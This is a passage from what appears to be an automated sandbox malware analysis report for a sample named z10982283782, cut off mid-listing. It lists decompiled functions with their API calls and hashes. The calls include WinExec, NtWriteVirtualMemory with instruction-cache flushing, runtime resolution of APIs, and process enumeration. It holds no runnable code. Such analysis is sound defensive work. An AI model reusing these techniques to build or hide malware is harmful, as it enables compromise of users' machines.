                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                          • Opcode ID: 5f33360eda032f1935db7223f5ddae7f67dc8957b6a154b7b489238aa596694f
                                                                                                                                          • Instruction ID: 27e74fad421c6a8ba85721ccdcc1ef2d45c9db4aae2f8669dd6d2faafd7c90ab
                                                                                                                                          • Opcode Fuzzy Hash: 5f33360eda032f1935db7223f5ddae7f67dc8957b6a154b7b489238aa596694f
                                                                                                                                          • Instruction Fuzzy Hash: 65411C75A90248AFEF10EBA9DA51ADEB3FAFF88704F104436E041A7254DE74AD028F55
                                                                                                                                          Function 02AA85BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02AA8624
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                          • Opcode ID: 027f0cdc7854e12fb01c3c8dbc8874299241483583c3e728e325278ae977c8f3
                                                                                                                                          • Instruction ID: 803d516db4daf8949730f76292d22d46bbd1fae6befafcf8920b359c5654cf4c
                                                                                                                                          • Opcode Fuzzy Hash: 027f0cdc7854e12fb01c3c8dbc8874299241483583c3e728e325278ae977c8f3
                                                                                                                                          • Instruction Fuzzy Hash: 24016D75684204BFFB00EBA9ED21B5AB7E9EB49B00F908460B900D3640DF38AD129A24
                                                                                                                                          Function 02AA85BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02AA8624
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                          • Opcode ID: 32b6d67095e60587008caf220f52c9ead8603c0ab14d6e4f4f6e1131c6cdb95a
                                                                                                                                          • Instruction ID: eb87b27a0ed57a27cdb4394f899ad8b3955ab7cd41e5894fe887427f549514db
                                                                                                                                          • Opcode Fuzzy Hash: 32b6d67095e60587008caf220f52c9ead8603c0ab14d6e4f4f6e1131c6cdb95a
                                                                                                                                          • Instruction Fuzzy Hash: 6FF06D75684204BFEB00EBA5ED21B5AB7E9EB49B00F908460B900D3640DF38AD129A24
                                                                                                                                          Function 02A9E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ClearVariant
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                          • Opcode ID: cdb64398d9bde2c5a22a8daeaff0fda308a8f7485e4790828ef4d0b271afef8e
                                                                                                                                          • Instruction ID: 41792a8bdaf7b24d0900b7a8e9a36f7c53bcba47abc96553b9f03ac4a0743242
                                                                                                                                          • Opcode Fuzzy Hash: cdb64398d9bde2c5a22a8daeaff0fda308a8f7485e4790828ef4d0b271afef8e
                                                                                                                                          • Instruction Fuzzy Hash: 62F03730788210D79E24EB3BDBC466B37EA6F44350B5058B7A8069B217DF64CC95CBA2
                                                                                                                                          Function 02A94D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SysFreeString.OLEAUT32(02AAF4A4), ref: 02A94C6E
                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 02A94D5B
                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02A94D6D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 986138563-0
                                                                                                                                          • Opcode ID: 7780bf044b9e6563690f5d10348b10d38056b497208d067018e10d3f425692e7
                                                                                                                                          • Instruction ID: 1a4fedc2e8c9767a7b3df258f11c570dc1abb2b0586888fefde663fc25295325
                                                                                                                                          • Opcode Fuzzy Hash: 7780bf044b9e6563690f5d10348b10d38056b497208d067018e10d3f425692e7
                                                                                                                                          • Instruction Fuzzy Hash: E6E01DB81052066EFF147F239D80B3B73E99FD5744B5444699400C9154DF38D441DD38
                                                                                                                                          Function 02AA70DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 02AA73DA
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeString
                                                                                                                                          • String ID: H
                                                                                                                                          • API String ID: 3341692771-2852464175
                                                                                                                                          • Opcode ID: bf696504626bbc9ccb84a6554efc48b54411cd2bc9681a9f284f88538f6a834e
                                                                                                                                          • Instruction ID: 257ddc6929e54cb2c05e9e70833975ed5da7944f239cc4f98262136821931263
                                                                                                                                          • Opcode Fuzzy Hash: bf696504626bbc9ccb84a6554efc48b54411cd2bc9681a9f284f88538f6a834e
                                                                                                                                          • Instruction Fuzzy Hash: 5AB1D274A016089FDB15CF99D990AAEFBF2FF89314F1585A9E805AB320DB30AC45CF50
                                                                                                                                          Function 02A9E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 02A9E781
                                                                                                                                            • Part of subcall function 02A9E364: VariantClear.OLEAUT32(?), ref: 02A9E373
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Variant$ClearCopy
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 274517740-0
                                                                                                                                          • Opcode ID: 4a2ca552491bc55f6b8fe2cd651b468b0c20f8b602bf382d1aeb5be524d5688a
                                                                                                                                          • Instruction ID: e6e9b8b4e1289306ec93bce529c5045f263d0b0e0545b4c4b7b1ff5212f78da7
                                                                                                                                          • Opcode Fuzzy Hash: 4a2ca552491bc55f6b8fe2cd651b468b0c20f8b602bf382d1aeb5be524d5688a
                                                                                                                                          • Instruction Fuzzy Hash: 8F115E70750210C7CF34EB6BCBC4AAA67EAAF85651B009467E54A8B216DF31CC41CB62
                                                                                                                                          Function 02A9E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitVariant
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                          • Opcode ID: a0586a4889e1fbf9f84ee880e8b8124f177f9ca9e0c3d33b83a70f0c709a09b0
                                                                                                                                          • Instruction ID: 40058b23476c0dd6597e42f0ea9cc63381c539af5e6dd87d5ba38cc31e7d7b02
                                                                                                                                          • Opcode Fuzzy Hash: a0586a4889e1fbf9f84ee880e8b8124f177f9ca9e0c3d33b83a70f0c709a09b0
                                                                                                                                          • Instruction Fuzzy Hash: 60315071640218EBDF10DFAACAC4AAA77F9EB4E314F444466F905D3242DB36D950CBA1
                                                                                                                                          Function 02AA89D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                            • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                            • Part of subcall function 02AA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4
                                                                                                                                          • FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1478290883-0
                                                                                                                                          • Opcode ID: 8a560e41471745e6ab9f770efe23a41471b0fbe1f1462d78e2d1f12528b0d0e0
                                                                                                                                          • Instruction ID: 961f368736cfa9c8404a6591687bd2df35321a95c6ac17bbad1b5c1da1effc13
                                                                                                                                          • Opcode Fuzzy Hash: 8a560e41471745e6ab9f770efe23a41471b0fbe1f1462d78e2d1f12528b0d0e0
                                                                                                                                          • Instruction Fuzzy Hash: 502115706C0300BFEB40FBA5EE11B5EB7E9EF04B00F504590B505E7190DF7499419A19
                                                                                                                                          Function 02AA6D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02AA6DB9,?,?,?,00000000), ref: 02AA6D99
                                                                                                                                            • Part of subcall function 02A94C60: SysFreeString.OLEAUT32(02AAF4A4), ref: 02A94C6E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeFromProgString
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4225568880-0
                                                                                                                                          • Opcode ID: 0464fcb50a5962ba1fbd8600d4e78896f0fb43d4b6e18dea4a290b5f64f378d0
                                                                                                                                          • Instruction ID: e939e31de1e0b2d7826b1357fa721889343fffcaeb1d4a91f38a4389412df17a
                                                                                                                                          • Opcode Fuzzy Hash: 0464fcb50a5962ba1fbd8600d4e78896f0fb43d4b6e18dea4a290b5f64f378d0
                                                                                                                                          • Instruction Fuzzy Hash: 6FE0A035280B087BEB11EA669D5194A77EDDF8AB50B5104B1A40093500DE316E0088A0
                                                                                                                                          Function 02A95868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleFileNameA.KERNEL32(02A90000,?,00000105), ref: 02A95886
                                                                                                                                            • Part of subcall function 02A95ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A90000,02ABE790), ref: 02A95AE8
                                                                                                                                            • Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A90000,02ABE790), ref: 02A95B06
                                                                                                                                            • Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A90000,02ABE790), ref: 02A95B24
                                                                                                                                            • Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A95B42
                                                                                                                                            • Part of subcall function 02A95ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A95B8B
                                                                                                                                            • Part of subcall function 02A95ACC: RegQueryValueExA.ADVAPI32(?,02A95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A95BD1,?,80000001), ref: 02A95BA9
                                                                                                                                            • Part of subcall function 02A95ACC: RegCloseKey.ADVAPI32(?,02A95BD8,00000000,?,?,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95BCB
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                          • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                          • Instruction ID: 8c04e23ef294845c9156600aec11a0d97864036628410415691c5bd2eee7d936
                                                                                                                                          • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                          • Instruction Fuzzy Hash: 44E065B1E003149FCF10DFA8C9C1B8633D8AB08750F4449A1EC68CF24ADBB0DA248BE0
                                                                                                                                          Function 02AAADB8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AAAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02AAADA3,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAAB30
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02AAAB48
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02AAAB5A
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02AAAB6C
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02AAAB7E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02AAAB90
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02AAABA2
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02AAABB4
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02AAABC6
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02AAABD8
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02AAABEA
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02AAABFC
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02AAAC0E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02AAAC20
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02AAAC32
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02AAAC44
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02AAAC56
                                                                                                                                          • Process32First.KERNEL32(?,00000128), ref: 02AAADC9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$FirstHandleModuleProcess32
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2774106396-0
                                                                                                                                          • Opcode ID: 1429c08370129e98e6f2532319c25d159700fc8b47b79c27de0b81fe39d37dda
                                                                                                                                          • Instruction ID: 48b6d848aed1a097c29a6c9a18104f324920a6a0ff426a4e8793bf1912694f04
                                                                                                                                          • Opcode Fuzzy Hash: 1429c08370129e98e6f2532319c25d159700fc8b47b79c27de0b81fe39d37dda
                                                                                                                                          • Instruction Fuzzy Hash: D6C01262612220178A1066F429845C2479DCD451A63040462A508D3103DB254C10E190
                                                                                                                                          Function 02AAADD8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AAAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02AAADA3,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAAB30
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02AAAB48
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02AAAB5A
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02AAAB6C
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02AAAB7E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02AAAB90
